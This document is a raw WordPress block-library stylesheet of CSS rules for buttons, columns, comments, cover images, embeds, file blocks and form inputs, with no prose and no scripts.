.wp-block-accordion-panel[aria-hidden=true],.wp-block-accordion-panel[inert]{ display:none; margin-block-start:0; } .wp-block-archives{ box-sizing:border-box; } .wp-block-archives-dropdown label{ display:block; } .wp-block-avatar{ line-height:0; } .wp-block-avatar,.wp-block-avatar img{ box-sizing:border-box; } .wp-block-avatar.aligncenter{ text-align:center; } .wp-block-audio{ box-sizing:border-box; } .wp-block-audio :where(figcaption){ margin-bottom:1em; margin-top:.5em; } .wp-block-audio audio{ min-width:300px; width:100%; } .wp-block-breadcrumbs{ box-sizing:border-box; } .wp-block-breadcrumbs ol{ flex-wrap:wrap; list-style:none; } .wp-block-breadcrumbs li,.wp-block-breadcrumbs ol{ align-items:center; display:flex; margin:0; padding:0; } .wp-block-breadcrumbs li:not(:last-child):after{ content:var(--separator, "/"); margin:0 .5em; opacity:.7; } .wp-block-breadcrumbs span{ color:inherit; } .wp-block-button__link{ align-content:center; box-sizing:border-box; cursor:pointer; display:inline-block; height:100%; text-align:center; word-break:break-word; } .wp-block-button__link.aligncenter{ text-align:center; } .wp-block-button__link.alignright{ text-align:right; } :where(.wp-block-button__link){ border-radius:9999px; box-shadow:none; padding:calc(.667em + 2px) calc(1.333em + 2px); text-decoration:none; } .wp-block-button[style*=text-decoration] .wp-block-button__link{ text-decoration:inherit; } .wp-block-buttons>.wp-block-button.has-custom-width{ max-width:none; } .wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{ width:100%; } .wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{ font-size:inherit; } .wp-block-buttons>.wp-block-button.wp-block-button__width-25{ width:calc(25% - var(--wp--style--block-gap, .5em)*.75); } .wp-block-buttons>.wp-block-button.wp-block-button__width-50{ width:calc(50% - var(--wp--style--block-gap, .5em)*.5); } .wp-block-buttons>.wp-block-button.wp-block-button__width-75{ width:calc(75% - var(--wp--style--block-gap, .5em)*.25); } .wp-block-buttons>.wp-block-button.wp-block-button__width-100{ flex-basis:100%; width:100%; } .wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-25{ width:25%; } .wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-50{ width:50%; } .wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-75{ width:75%; } .wp-block-button.is-style-squared,.wp-block-button__link.wp-block-button.is-style-squared{ border-radius:0; } .wp-block-button.no-border-radius,.wp-block-button__link.no-border-radius{ border-radius:0 !important; } :root :where(.wp-block-button .wp-block-button__link.is-style-outline),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link){ border:2px solid; padding:.667em 1.333em; } :root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-text-color)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-text-color)){ color:currentColor; } :root :where(.wp-block-button .wp-block-button__link.is-style-outline:not(.has-background)),:root :where(.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-background)){ background-color:initial; background-image:none; } .wp-block-buttons{ box-sizing:border-box; } .wp-block-buttons.is-vertical{ flex-direction:column; } .wp-block-buttons.is-vertical>.wp-block-button:last-child{ margin-bottom:0; } .wp-block-buttons>.wp-block-button{ display:inline-block; margin:0; } .wp-block-buttons.is-content-justification-left{ justify-content:flex-start; } .wp-block-buttons.is-content-justification-left.is-vertical{ align-items:flex-start; } .wp-block-buttons.is-content-justification-center{ justify-content:center; } .wp-block-buttons.is-content-justification-center.is-vertical{ align-items:center; } .wp-block-buttons.is-content-justification-right{ justify-content:flex-end; } .wp-block-buttons.is-content-justification-right.is-vertical{ align-items:flex-end; } .wp-block-buttons.is-content-justification-space-between{ justify-content:space-between; } .wp-block-buttons.aligncenter{ text-align:center; } .wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block-button.aligncenter{ margin-left:auto; margin-right:auto; width:100%; } .wp-block-buttons[style*=text-decoration] .wp-block-button,.wp-block-buttons[style*=text-decoration] .wp-block-button__link{ text-decoration:inherit; } .wp-block-buttons.has-custom-font-size .wp-block-button__link{ font-size:inherit; } .wp-block-buttons .wp-block-button__link{ width:100%; } .wp-block-button.aligncenter,.wp-block-calendar{ text-align:center; } .wp-block-calendar td,.wp-block-calendar th{ border:1px solid; padding:.25em; } .wp-block-calendar th{ font-weight:400; } .wp-block-calendar caption{ background-color:inherit; } .wp-block-calendar table{ border-collapse:collapse; width:100%; } .wp-block-calendar table.has-background th{ background-color:inherit; } .wp-block-calendar table.has-text-color th{ color:inherit; } .wp-block-calendar :where(table:not(.has-text-color)){ color:#40464d; } .wp-block-calendar :where(table:not(.has-text-color)) td,.wp-block-calendar :where(table:not(.has-text-color)) th{ border-color:#ddd; } :where(.wp-block-calendar table:not(.has-background) th){ background:#ddd; } .wp-block-categories{ box-sizing:border-box; } .wp-block-categories.alignleft{ margin-right:2em; } .wp-block-categories.alignright{ margin-left:2em; } .wp-block-categories.wp-block-categories-dropdown.aligncenter{ text-align:center; } .wp-block-categories .wp-block-categories__label{ display:block; width:100%; } .wp-block-code{ box-sizing:border-box; } .wp-block-code code{ direction:ltr; display:block; font-family:inherit; overflow-wrap:break-word; text-align:initial; white-space:pre-wrap; } .wp-block-columns{ box-sizing:border-box; display:flex; flex-wrap:wrap !important; } @media (min-width:782px){ .wp-block-columns{ flex-wrap:nowrap !important; } } .wp-block-columns{ align-items:normal !important; } .wp-block-columns.are-vertically-aligned-top{ align-items:flex-start; } .wp-block-columns.are-vertically-aligned-center{ align-items:center; } .wp-block-columns.are-vertically-aligned-bottom{ align-items:flex-end; } @media (max-width:781px){ .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{ flex-basis:100% !important; } } @media (min-width:782px){ .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{ flex-basis:0; flex-grow:1; } .wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column[style*=flex-basis]{ flex-grow:0; } } .wp-block-columns.is-not-stacked-on-mobile{ flex-wrap:nowrap !important; } .wp-block-columns.is-not-stacked-on-mobile>.wp-block-column{ flex-basis:0; flex-grow:1; } .wp-block-columns.is-not-stacked-on-mobile>.wp-block-column[style*=flex-basis]{ flex-grow:0; } :where(.wp-block-columns){ margin-bottom:1.75em; } :where(.wp-block-columns.has-background){ padding:1.25em 2.375em; } .wp-block-column{ flex-grow:1; min-width:0; overflow-wrap:break-word; word-break:break-word; } .wp-block-column.is-vertically-aligned-top{ align-self:flex-start; } .wp-block-column.is-vertically-aligned-center{ align-self:center; } .wp-block-column.is-vertically-aligned-bottom{ align-self:flex-end; } .wp-block-column.is-vertically-aligned-stretch{ align-self:stretch; } .wp-block-column.is-vertically-aligned-bottom,.wp-block-column.is-vertically-aligned-center,.wp-block-column.is-vertically-aligned-top{ width:100%; } .wp-block-post-comments{ box-sizing:border-box; } .wp-block-post-comments .alignleft{ float:left; } .wp-block-post-comments .alignright{ float:right; } .wp-block-post-comments .navigation:after{ clear:both; content:""; display:table; } .wp-block-post-comments .commentlist{ clear:both; list-style:none; margin:0; padding:0; } .wp-block-post-comments .commentlist .comment{ min-height:2.25em; padding-left:3.25em; } .wp-block-post-comments .commentlist .comment p{ font-size:1em; line-height:1.8; margin:1em 0; } .wp-block-post-comments .commentlist .children{ list-style:none; margin:0; padding:0; } .wp-block-post-comments .comment-author{ line-height:1.5; } .wp-block-post-comments .comment-author .avatar{ border-radius:1.5em; display:block; float:left; height:2.5em; margin-right:.75em; margin-top:.5em; width:2.5em; } .wp-block-post-comments .comment-author cite{ font-style:normal; } .wp-block-post-comments .comment-meta{ font-size:.875em; line-height:1.5; } .wp-block-post-comments .comment-meta b{ font-weight:400; } .wp-block-post-comments .comment-meta .comment-awaiting-moderation{ display:block; margin-bottom:1em; margin-top:1em; } .wp-block-post-comments .comment-body .commentmetadata{ font-size:.875em; } .wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{ display:block; margin-bottom:.25em; } .wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{ box-sizing:border-box; display:block; width:100%; } .wp-block-post-comments .comment-form-cookies-consent{ display:flex; gap:.25em; } .wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{ margin-top:.35em; } .wp-block-post-comments .comment-reply-title{ margin-bottom:0; } .wp-block-post-comments .comment-reply-title :where(small){ font-size:var(--wp--preset--font-size--medium, smaller); margin-left:.5em; } .wp-block-post-comments .reply{ font-size:.875em; margin-bottom:1.4em; } .wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{ border:1px solid #949494; font-family:inherit; font-size:1em; } .wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{ padding:calc(.667em + 2px); } :where(.wp-block-post-comments input[type=submit]){ border:none; } .wp-block-comments{ box-sizing:border-box; } .wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{ font-size:inherit; } .wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow{ display:inline-block; margin-right:1ch; } .wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow:not(.is-arrow-chevron){ transform:scaleX(1); } .wp-block-comments-pagination .wp-block-comments-pagination-next-arrow{ display:inline-block; margin-left:1ch; } .wp-block-comments-pagination .wp-block-comments-pagination-next-arrow:not(.is-arrow-chevron){ transform:scaleX(1); } .wp-block-comments-pagination.aligncenter{ justify-content:center; } .wp-block-comment-template{ box-sizing:border-box; list-style:none; margin-bottom:0; max-width:100%; padding:0; } .wp-block-comment-template li{ clear:both; } .wp-block-comment-template ol{ list-style:none; margin-bottom:0; max-width:100%; padding-left:2rem; } .wp-block-comment-template.alignleft{ float:left; } .wp-block-comment-template.aligncenter{ margin-left:auto; margin-right:auto; width:fit-content; } .wp-block-comment-template.alignright{ float:right; } .wp-block-comment-date{ box-sizing:border-box; } .comment-awaiting-moderation{ display:block; font-size:.875em; line-height:1.5; } .wp-block-comment-author-name,.wp-block-comment-content,.wp-block-comment-edit-link,.wp-block-comment-reply-link{ box-sizing:border-box; } .wp-block-cover,.wp-block-cover-image{ align-items:center; background-position:50%; box-sizing:border-box; display:flex; justify-content:center; min-height:430px; overflow:hidden; overflow:clip; padding:1em; position:relative; } .wp-block-cover .has-background-dim:not([class*=-background-color]),.wp-block-cover-image .has-background-dim:not([class*=-background-color]),.wp-block-cover-image.has-background-dim:not([class*=-background-color]),.wp-block-cover.has-background-dim:not([class*=-background-color]){ background-color:#000; } .wp-block-cover .has-background-dim.has-background-gradient,.wp-block-cover-image .has-background-dim.has-background-gradient{ background-color:initial; } .wp-block-cover-image.has-background-dim:before,.wp-block-cover.has-background-dim:before{ background-color:inherit; content:""; } .wp-block-cover .wp-block-cover__background,.wp-block-cover .wp-block-cover__gradient-background,.wp-block-cover-image .wp-block-cover__background,.wp-block-cover-image .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim:not(.has-background-gradient):before,.wp-block-cover.has-background-dim:not(.has-background-gradient):before{ bottom:0; left:0; opacity:.5; position:absolute; right:0; top:0; } .wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-10:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-10:not(.has-background-gradient):before{ opacity:.1; } .wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-20:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-20:not(.has-background-gradient):before{ opacity:.2; } .wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-30:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-30:not(.has-background-gradient):before{ opacity:.3; } .wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-40:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-40:not(.has-background-gradient):before{ opacity:.4; } .wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-50:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-50:not(.has-background-gradient):before{ opacity:.5; } .wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-60:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-60:not(.has-background-gradient):before{ opacity:.6; } .wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-70:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-70:not(.has-background-gradient):before{ opacity:.7; } .wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-80:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-80:not(.has-background-gradient):before{ opacity:.8; } .wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-90:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-90:not(.has-background-gradient):before{ opacity:.9; } .wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-100:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-100:not(.has-background-gradient):before{ opacity:1; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0{ opacity:0; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10{ opacity:.1; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20{ opacity:.2; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30{ opacity:.3; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40{ opacity:.4; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50{ opacity:.5; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60{ opacity:.6; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70{ opacity:.7; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80{ opacity:.8; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90{ opacity:.9; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100{ opacity:1; } .wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.alignleft,.wp-block-cover.alignright{ max-width:420px; width:100%; } .wp-block-cover-image.aligncenter,.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.aligncenter,.wp-block-cover.alignleft,.wp-block-cover.alignright{ display:flex; } .wp-block-cover .wp-block-cover__inner-container,.wp-block-cover-image .wp-block-cover__inner-container{ color:inherit; position:relative; width:100%; } .wp-block-cover-image.is-position-top-left,.wp-block-cover.is-position-top-left{ align-items:flex-start; justify-content:flex-start; } .wp-block-cover-image.is-position-top-center,.wp-block-cover.is-position-top-center{ align-items:flex-start; justify-content:center; } .wp-block-cover-image.is-position-top-right,.wp-block-cover.is-position-top-right{ align-items:flex-start; justify-content:flex-end; } .wp-block-cover-image.is-position-center-left,.wp-block-cover.is-position-center-left{ align-items:center; justify-content:flex-start; } .wp-block-cover-image.is-position-center-center,.wp-block-cover.is-position-center-center{ align-items:center; justify-content:center; } .wp-block-cover-image.is-position-center-right,.wp-block-cover.is-position-center-right{ align-items:center; justify-content:flex-end; } .wp-block-cover-image.is-position-bottom-left,.wp-block-cover.is-position-bottom-left{ align-items:flex-end; justify-content:flex-start; } .wp-block-cover-image.is-position-bottom-center,.wp-block-cover.is-position-bottom-center{ align-items:flex-end; justify-content:center; } .wp-block-cover-image.is-position-bottom-right,.wp-block-cover.is-position-bottom-right{ align-items:flex-end; justify-content:flex-end; } .wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container{ margin:0; } .wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container{ margin:0; width:auto; } .wp-block-cover .wp-block-cover__image-background,.wp-block-cover video.wp-block-cover__video-background,.wp-block-cover-image .wp-block-cover__image-background,.wp-block-cover-image video.wp-block-cover__video-background{ border:none; bottom:0; box-shadow:none; height:100%; left:0; margin:0; max-height:none; max-width:none; object-fit:cover; outline:none; padding:0; position:absolute; right:0; top:0; width:100%; } .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{ background-attachment:fixed; background-repeat:no-repeat; background-size:cover; } @supports (-webkit-touch-callout:inherit){ .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{ background-attachment:scroll; } } @media (prefers-reduced-motion:reduce){ .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{ background-attachment:scroll; } } .wp-block-cover-image.is-repeated,.wp-block-cover.is-repeated,.wp-block-cover__image-background.is-repeated,video.wp-block-cover__video-background.is-repeated{ background-repeat:repeat; background-size:auto; } .wp-block-cover-image-text,.wp-block-cover-image-text a,.wp-block-cover-image-text a:active,.wp-block-cover-image-text a:focus,.wp-block-cover-image-text a:hover,.wp-block-cover-text,.wp-block-cover-text a,.wp-block-cover-text a:active,.wp-block-cover-text a:focus,.wp-block-cover-text a:hover,section.wp-block-cover-image h2,section.wp-block-cover-image h2 a,section.wp-block-cover-image h2 a:active,section.wp-block-cover-image h2 a:focus,section.wp-block-cover-image h2 a:hover{ color:#fff; } .wp-block-cover-image .wp-block-cover.has-left-content{ justify-content:flex-start; } .wp-block-cover-image .wp-block-cover.has-right-content{ justify-content:flex-end; } .wp-block-cover-image.has-left-content .wp-block-cover-image-text,.wp-block-cover.has-left-content .wp-block-cover-text,section.wp-block-cover-image.has-left-content>h2{ margin-left:0; text-align:left; } .wp-block-cover-image.has-right-content .wp-block-cover-image-text,.wp-block-cover.has-right-content .wp-block-cover-text,section.wp-block-cover-image.has-right-content>h2{ margin-right:0; text-align:right; } .wp-block-cover .wp-block-cover-text,.wp-block-cover-image .wp-block-cover-image-text,section.wp-block-cover-image>h2{ font-size:2em; line-height:1.25; margin-bottom:0; max-width:840px; padding:.44em; text-align:center; z-index:1; } :where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){ color:#fff; } :where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){ color:#000; } :root :where(.wp-block-cover h1:not(.has-text-color)),:root :where(.wp-block-cover h2:not(.has-text-color)),:root :where(.wp-block-cover h3:not(.has-text-color)),:root :where(.wp-block-cover h4:not(.has-text-color)),:root :where(.wp-block-cover h5:not(.has-text-color)),:root :where(.wp-block-cover h6:not(.has-text-color)),:root :where(.wp-block-cover p:not(.has-text-color)){ color:inherit; } body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__image-background,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__video-background{ z-index:0; } body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__background,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__gradient-background,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__inner-container,body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)).has-background-dim:not(.has-background-gradient):before{ z-index:1; } .has-modal-open body:not(.editor-styles-wrapper) .wp-block-cover:not(.wp-block-cover:has(.wp-block-cover__background+.wp-block-cover__inner-container)) .wp-block-cover__inner-container{ z-index:auto; } .wp-block-details{ box-sizing:border-box; } .wp-block-details summary{ cursor:pointer; } .wp-block-embed.alignleft,.wp-block-embed.alignright,.wp-block[data-align=left]>[data-type="core/embed"],.wp-block[data-align=right]>[data-type="core/embed"]{ max-width:360px; width:100%; } .wp-block-embed.alignleft .wp-block-embed__wrapper,.wp-block-embed.alignright .wp-block-embed__wrapper,.wp-block[data-align=left]>[data-type="core/embed"] .wp-block-embed__wrapper,.wp-block[data-align=right]>[data-type="core/embed"] .wp-block-embed__wrapper{ min-width:280px; } .wp-block-cover .wp-block-embed{ min-height:240px; min-width:320px; } .wp-block-embed{ overflow-wrap:break-word; } .wp-block-embed :where(figcaption){ margin-bottom:1em; margin-top:.5em; } .wp-block-embed iframe{ max-width:100%; } .wp-block-embed__wrapper{ position:relative; } .wp-embed-responsive .wp-has-aspect-ratio .wp-block-embed__wrapper:before{ content:""; display:block; padding-top:50%; } .wp-embed-responsive .wp-has-aspect-ratio iframe{ bottom:0; height:100%; left:0; position:absolute; right:0; top:0; width:100%; } .wp-embed-responsive .wp-embed-aspect-21-9 .wp-block-embed__wrapper:before{ padding-top:42.85%; } .wp-embed-responsive .wp-embed-aspect-18-9 .wp-block-embed__wrapper:before{ padding-top:50%; } .wp-embed-responsive .wp-embed-aspect-16-9 .wp-block-embed__wrapper:before{ padding-top:56.25%; } .wp-embed-responsive .wp-embed-aspect-4-3 .wp-block-embed__wrapper:before{ padding-top:75%; } .wp-embed-responsive .wp-embed-aspect-1-1 .wp-block-embed__wrapper:before{ padding-top:100%; } .wp-embed-responsive .wp-embed-aspect-9-16 .wp-block-embed__wrapper:before{ padding-top:177.77%; } .wp-embed-responsive .wp-embed-aspect-1-2 .wp-block-embed__wrapper:before{ padding-top:200%; } .wp-block-file{ box-sizing:border-box; } .wp-block-file:not(.wp-element-button){ font-size:.8em; } .wp-block-file.aligncenter{ text-align:center; } .wp-block-file.alignright{ text-align:right; } .wp-block-file *+.wp-block-file__button{ margin-left:.75em; } :where(.wp-block-file){ margin-bottom:1.5em; } .wp-block-file__embed{ margin-bottom:1em; } :where(.wp-block-file__button){ border-radius:2em; display:inline-block; padding:.5em 1em; } :where(.wp-block-file__button):where(a):active,:where(.wp-block-file__button):where(a):focus,:where(.wp-block-file__button):where(a):hover,:where(.wp-block-file__button):where(a):visited{ box-shadow:none; color:#fff; opacity:.85; text-decoration:none; } .wp-block-form-input__label{ display:flex; flex-direction:column; gap:.25em; margin-bottom:.5em; width:100%; } .wp-block-form-input__label.is-label-inline{ align-items:center; flex-direction:row; gap:.5em; } .wp-block-form-input__label.is-label-inline .wp-block-form-input__label-content{ margin-bottom:.5em; } .wp-block-form-input__label:has(input[type=checkbox]){ flex-direction:row; width:fit-content; } .wp-block-form-input__label:has(input[type=checkbox]) .wp-block-form-input__label-content{ margin:0; } .wp-block-form-input__label:has(.wp-block-form-input__label-content+input[type=checkbox]){ flex-direction:row-reverse; } .wp-block-form-input__label-content{ width:fit-content; } :where(.wp-block-form-input__input){ font-size:1em; margin-bottom:.5em; padding:0 .5em; } 